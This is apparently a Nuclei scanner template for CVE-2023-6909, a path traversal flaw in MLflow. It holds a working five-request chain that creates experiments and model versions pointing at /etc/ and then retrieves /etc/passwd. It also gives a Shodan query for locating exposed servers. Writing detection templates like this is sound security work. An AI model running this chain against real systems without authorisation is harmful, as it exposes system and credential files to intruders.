id: CVE-2023-6909 info: name: Mlflow <2.9.2 - Path Traversal author: Hyunsoo-ds severity: high description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. impact: | Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. remediation: | To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. reference: - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6909 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6909 cwe-id: CWE-29 epss-score: 0.00409 epss-percentile: 0.73387 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" tags: cve,cve2023,mlflow,lfi,intrusive http: - raw: - | POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 Host: {{Hostname}} {"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"} - | POST /api/2.0/mlflow/runs/create HTTP/1.1 Host: {{Hostname}} {"experiment_id": "{{EXPERIMENT_ID}}"} - | POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} {"name": "{{randstr}}"} - | POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} {"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"} - | GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header_5 words: - "filename=passwd" - "application/octet-stream" condition: and - type: status status: - 200 extractors: - type: json part: body_1 name: EXPERIMENT_ID group: 1 json: - '.experiment_id' internal: true - type: json part: body_2 name: RUN_ID group: 1 json: - '.run.info.run_id' internal: true # digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950